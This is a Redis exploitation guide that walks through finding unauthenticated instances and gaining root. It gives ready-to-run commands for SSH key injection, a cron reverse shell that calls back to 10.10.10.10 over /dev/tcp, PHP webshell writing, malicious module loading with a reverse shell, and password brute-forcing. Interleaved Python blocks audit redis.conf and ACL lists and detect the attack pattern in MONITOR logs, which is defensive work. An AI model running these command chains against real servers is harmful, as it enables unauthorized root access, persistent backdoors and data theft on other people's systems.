Redis Exploitation: From Unauthenticated Access to RCE and SSH Key Injection
Redis is an in-memory data store widely used for caching, sessions, and message queuing. When exposed to the internet without authentication — a shockingly common misconfiguration — it becomes trivially exploitable, often leading to remote code execution as root. This guide covers the full exploitation chain.
| Technique | Redis Version | Requirement | Difficulty |
|---|---|---|---|
| Cron RCE | All | Write access to /etc/cron.d | Easy |
| SSH key injection | All | Root running Redis, SSH enabled | Easy |
| Webshell via config | All | Web server path known | Easy |
| Redis module RCE | 4.x+ | CONFIG COMMAND available | Medium |
| Master-Replica RCE | 4.x+ | Network access | Hard |
| SSRF to Redis | All | SSRF on same network | Medium |
Finding Exposed Redis Instances
Redis listens on TCP port 6379 by default. Finding unauthenticated instances is straightforward:
```bash
# Shodan dork
port:6379 -auth
# nmap scan with banner grab
nmap -p 6379 --script redis-info 192.168.1.0/24
# Quick connectivity test
redis-cli -h 192.168.1.50 ping
# Expected response: PONG (no auth required)
# From Shodan/Censys, pipe IPs directly
while read ip; do redis-cli -h "$ip" --no-auth-warning ping 2>/dev/null && echo "$ip OPEN"; done < ips.txt
```
Basic Redis Commands for Recon
Once connected, gather intelligence before exploiting:
```bash
# Server info — OS, Redis version, running user, data dir
redis-cli -h 192.168.1.50 INFO server
# All configuration values
redis-cli -h 192.168.1.50 CONFIG GET *
# List all keys (careful on large prod instances — use SCAN instead)
redis-cli -h 192.168.1.50 KEYS *
# Safer key enumeration
redis-cli -h 192.168.1.50 SCAN 0 COUNT 100
# Read a specific key
redis-cli -h 192.168.1.50 GET session:user123
# Check the data directory and dbfilename
redis-cli -h 192.168.1.50 CONFIG GET dir
redis-cli -h 192.168.1.50 CONFIG GET dbfilename
```
Note the running user (often root on misconfigured servers) and the data directory (typically /var/lib/redis or /etc/redis).
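The same settings that this recon step reveals are the ones a defender should verify before an attacker does. The Python script below is an added example, not code from the original guide: it parses a redis.conf and reports the directives that make the attacks in this guide possible. The two embedded excerpts are constructed (one reproducing the weak setup, one hardened), and the requirepass placeholder, the rename-command list and the /var/lib/redis baseline are assumptions to adapt to your deployment.

```python
import shlex

# Constructed redis.conf excerpts (not from the original page): weak setup vs hardened baseline.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
# requirepass left commented out
dir /var/lib/redis
"""
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
requirepass "REPLACE-WITH-A-LONG-RANDOM-SECRET"
rename-command CONFIG ""
rename-command MODULE ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
dir /var/lib/redis
"""

def parse_conf(text):
    """Map each directive to the list of argument lists it was given (Redis keeps the last one)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)          # handles quoted args such as: rename-command CONFIG ""
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit_conf(conf):
    findings = []
    binds = [addr for args in conf.get("bind", []) for addr in args]
    if not binds or any(b in ("0.0.0.0", "*", "::", "-::*") for b in binds):
        findings.append("bind: reachable on all interfaces (no bind, 0.0.0.0 or *)")
    password = conf.get("requirepass", [[]])[-1]
    has_pass = bool(password and password[0])
    if not has_pass:
        findings.append("requirepass not set: unauthenticated access")
    pm = conf.get("protected-mode", [["yes"]])[-1]
    if pm and pm[0].lower() == "no" and not has_pass:
        findings.append("protected-mode no: the built-in no-password safety net is disabled")
    # Renaming these to "" removes the file-write, module-load and replica primitives entirely
    # (ACL rules are the preferred control on Redis 6+).
    disabled = {args[0].upper() for args in conf.get("rename-command", [])
                if len(args) == 2 and args[1] == ""}
    for cmd in ("CONFIG", "MODULE", "SLAVEOF", "REPLICAOF"):
        if cmd not in disabled:
            findings.append(f"{cmd} still callable by its real name")
    return findings
```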
SSH Key Injection
If Redis runs as root, you can write your SSH public key into root's authorized_keys by changing the data directory and dump filename.
```bash
# Generate an SSH key pair on your attack box
ssh-keygen -t rsa -b 4096 -f /tmp/redis_key -N ''
# Prepare the key with padding (Redis adds extra newlines in dumps)
(echo -e "\n\n"; cat /tmp/redis_key.pub; echo -e "\n\n") > /tmp/key_padded.txt
# Connect and inject
redis-cli -h 192.168.1.50 CONFIG SET dir /root/.ssh
redis-cli -h 192.168.1.50 CONFIG SET dbfilename authorized_keys
# Set the key as a Redis value and write to disk
redis-cli -h 192.168.1.50 SET inject "$(cat /tmp/key_padded.txt)"
redis-cli -h 192.168.1.50 BGSAVE
# Wait a moment, then SSH in
ssh -i /tmp/redis_key root@192.168.1.50
```
Cron-Based Reverse Shell
On systems where SSH isn't running or the .ssh write fails, write a cron job that calls back to your listener.
```bash
# Set up your listener first
nc -lvnp 4444
# Write cron job via Redis
redis-cli -h 192.168.1.50 CONFIG SET dir /var/spool/cron/crontabs
redis-cli -h 192.168.1.50 CONFIG SET dbfilename root
redis-cli -h 192.168.1.50 SET cron "
* * * * * bash -i >&/dev/tcp/10.10.10.10/4444 0>&1
"
redis-cli -h 192.168.1.50 BGSAVE
# On Debian/Ubuntu the crontab path may be different
redis-cli -h 192.168.1.50 CONFIG SET dir /var/spool/cron
redis-cli -h 192.168.1.50 CONFIG SET dbfilename www-data
```
WebShell via SAVE
If you know the web root path, write a PHP or JSP WebShell directly:
```bash
# PHP WebShell injection
redis-cli -h 192.168.1.50 CONFIG SET dir /var/www/html
redis-cli -h 192.168.1.50 CONFIG SET dbfilename shell.php
redis-cli -h 192.168.1.50 SET webshell "
"
redis-cli -h 192.168.1.50 BGSAVE
# Verify
curl 'http://192.168.1.50/shell.php?cmd=id'
# Note: the RDB dump format adds binary headers — the PHP parser ignores them
```
Redis Module Loading for RCE
Redis 4.x+ supports loading custom modules. If you can write files, load a malicious shared library that exposes a system() command:
```bash
# Use the RedisModules-ExecuteCommand PoC
# https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
# Transfer the .so file to the target (via Redis SET + BGSAVE trick or other means)
redis-cli -h 192.168.1.50 MODULE LOAD /tmp/module.so
# Execute commands via loaded module
redis-cli -h 192.168.1.50 system.exec "id"
redis-cli -h 192.168.1.50 system.exec "bash -c 'bash -i >&/dev/tcp/10.10.10.10/4444 0>&1'"
```
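Every technique from SSH key injection through module loading leaves the same footprint on the server: CONFIG SET dir/dbfilename followed by SAVE or BGSAVE, a MODULE LOAD, or a SLAVEOF/REPLICAOF. The detector below is an added example, not part of the original guide; it runs over `redis-cli MONITOR` output (the embedded capture is constructed) and alerts per client when the dump is retargeted outside an assumed data directory of /var/lib/redis, when a module is loaded, or when the instance is pointed at a new master.

```python
import re
from collections import defaultdict

# One line of `redis-cli MONITOR` output looks like:
# 1700000001.100000 [0 10.0.0.5:40000] "CONFIG" "SET" "dir" "/root/.ssh"
LINE_RE = re.compile(r'^(?P<ts>[\d.]+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
DATA_DIR = "/var/lib/redis"   # assumed baseline: the only directory an RDB dump should land in

def parse_line(line):
    """Return (client, [args]) for a MONITOR line, or None for anything else (e.g. the leading OK)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = ARG_RE.findall(m.group("args"))
    return m.group("client"), [a.upper() if i < 2 else a for i, a in enumerate(args)]

def detect_abuse(lines):
    """Track CONFIG SET dir/dbfilename per client; alert on dumps outside DATA_DIR, MODULE LOAD, SLAVEOF."""
    state = defaultdict(lambda: {"dir": DATA_DIR, "dbfilename": "dump.rdb"})
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        client, args = parsed
        cmd = args[0] if args else ""
        if cmd == "CONFIG" and len(args) >= 4 and args[1] == "SET" and args[2].lower() in state[client]:
            state[client][args[2].lower()] = args[3]
        elif cmd in ("SAVE", "BGSAVE"):
            d, f = state[client]["dir"], state[client]["dbfilename"]
            if not d.startswith(DATA_DIR) or not f.endswith(".rdb"):
                alerts.append((client, f"RDB dump retargeted to {d}/{f}"))
        elif cmd == "MODULE" and len(args) >= 2 and args[1] == "LOAD":
            alerts.append((client, f"MODULE LOAD {args[2] if len(args) > 2 else ''}".strip()))
        elif cmd in ("SLAVEOF", "REPLICAOF"):
            alerts.append((client, f"{cmd} {' '.join(args[1:])}"))
    return alerts

# Constructed sample capture: the SSH-key chain from this guide, a benign BGSAVE, and a module load.
SAMPLE = """\
OK
1700000001.100000 [0 10.0.0.5:40000] "CONFIG" "SET" "dir" "/root/.ssh"
1700000002.100000 [0 10.0.0.5:40000] "CONFIG" "SET" "dbfilename" "authorized_keys"
1700000003.100000 [0 10.0.0.5:40000] "SET" "inject" "\\n\\nssh-rsa AAAA...\\n\\n"
1700000004.100000 [0 10.0.0.5:40000] "BGSAVE"
1700000005.100000 [0 10.0.0.9:40001] "BGSAVE"
1700000006.100000 [0 10.0.0.7:40002] "MODULE" "LOAD" "/tmp/module.so"
"""
```

In practice feed it `redis-cli MONITOR` over a pipe or a log shipper rather than a string, and pair it with a `CONFIG GET dir` baseline check so a legitimately relocated data directory does not fire.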
Bypassing Authenticated Redis
Redis authentication is a single shared password set via requirepass. Weak passwords are common:
```bash
# Try common default passwords by hand
redis-cli -h 192.168.1.50 AUTH password
redis-cli -h 192.168.1.50 AUTH redis
redis-cli -h 192.168.1.50 AUTH 123456
# Automated brute force with Medusa (-n sets the port; -p would be a single password)
medusa -h 192.168.1.50 -n 6379 -u '' -P /usr/share/wordlists/rockyou.txt -M redis
# Redis 6+ ACL — even with auth, check for weak ACL users
redis-cli -h 192.168.1.50 -a 'weakpassword' ACL LIST
redis-cli -h 192.168.1.50 -a 'weakpassword' ACL WHOAMI
```
Redis 6 introduced ACL users, but default configurations often leave the default user with full access. Check for NOPASS entries in the ACL list.
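To find the NOPASS and over-privileged users described above on your own instances, here is an added Python audit over `redis-cli ACL LIST` output (not code from the original page). It applies command rules left to right the way Redis does, so a user granted +@all but then stripped with -@dangerous is correctly not flagged; the sample lines and the zero-filled password hashes are constructed.

```python
# Audit `ACL LIST` output for users that would let an attacker do what this guide
# describes: enabled users with no password, and users whose command rules still
# permit CONFIG (file write), MODULE (module RCE) or SLAVEOF/REPLICAOF.
DANGEROUS = ("config", "module", "replicaof", "slaveof")   # all four sit in @admin and @dangerous

def effective_dangerous(rules):
    """Apply ACL command rules left to right, as Redis does; return which DANGEROUS commands survive."""
    allowed = {c: False for c in DANGEROUS}
    for rule in rules:
        r = rule.lower()
        if r in ("+@all", "allcommands", "+@dangerous", "+@admin"):
            allowed = {c: True for c in DANGEROUS}
        elif r in ("-@all", "nocommands", "-@dangerous", "-@admin"):
            allowed = {c: False for c in DANGEROUS}
        elif r[:1] in "+-" and r[1:] in DANGEROUS:
            allowed[r[1:]] = r[0] == "+"
        elif r == "+config|set":                  # a subcommand grant is enough for the dir/dbfilename trick
            allowed["config"] = True
    return sorted(c for c, ok in allowed.items() if ok)

def audit_acl_list(lines):
    """Return (user, finding) pairs from `redis-cli ACL LIST` output."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3 or parts[0] != "user":
            continue
        user, rules = parts[1], parts[2:]
        if "off" in rules:
            continue                              # disabled users cannot authenticate at all
        if "nopass" in rules:
            findings.append((user, "enabled without a password (nopass)"))
        risky = effective_dangerous(rules)
        if risky:
            findings.append((user, "may run " + ", ".join(risky)))
    return findings

# Constructed sample (hashes are placeholders, not real password digests).
FAKE_HASH = "#" + "0" * 64
SAMPLE_ACL = [
    "user default on nopass sanitize-payload ~* &* +@all",
    f"user app on {FAKE_HASH} ~cache:* &* -@all +get +set +del",
    f"user ops on {FAKE_HASH} ~* &* +@all -@dangerous +config|get",
    "user legacy off nopass ~* &* +@all",
]
```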
Real-World Impact Examples
- 2015: Thousands of internet-facing Redis servers exploited via SSH key injection — root shells in seconds
- Cryptomining campaigns (2018-present) systematically exploit unauthenticated Redis for persistent cron miners
- Cloud environments: Redis on 0.0.0.0 inside VPCs accessible via SSRF chains targeting app servers
Use the Network Recon Tool to discover Redis instances during your engagement. For SSRF chains that can reach internal Redis, see our SSRF Exploitation Guide. Cloud deployments often have Redis accessible via internal metadata paths — combine with Cloud Metadata Exploitation techniques.